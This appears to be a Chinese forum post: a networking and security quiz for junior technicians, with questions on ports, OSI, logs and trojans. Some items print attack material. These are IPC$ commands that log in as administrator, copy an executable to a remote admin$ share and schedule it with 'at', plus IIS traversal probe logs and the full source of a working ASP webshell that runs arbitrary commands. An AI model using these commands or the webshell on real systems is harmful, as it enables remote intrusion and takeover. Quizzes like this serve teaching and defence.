技术员初级考试卷

测试一下你真正的水平吧!

一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站，那么它们分别是什么意义？

二、
常用端口识别
20 21 23
25 80 110
139 443 445

三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32

四、
试述下列命令的区别，如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe

五、
W3SVC日志是什么？分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -

六、
netstat命令有何作用，举出两个参数进行说明。

七、
试述木马的一些基本特征。

八、
如何利用脚本实现对ftp的自动操作？

九、
下面是一个ASP木马，请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分）
那么，如何在不打补丁的情况下避免这种攻击的发生？

十一、OSI模型中哪一层上有协议？分别是什么？

十二、观察ping命令的返回包的TTL值，可以了解到什么？

十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69
请问 这可能是什么样的会话，采用什么协议，进行什么样的作业？

十四、常试用批处理做个动画片.

十五、QQ中的USER文件有什么用？

十六、假如客户机非法建了新的服务端,你怎么把非法的服务端找出来？(说万象的就行)

十七、谈谈你对网络安全是什么看法？

有兴趣的在评论中把自己的答案写下.

                                                           
清风

                                                           QQ249699888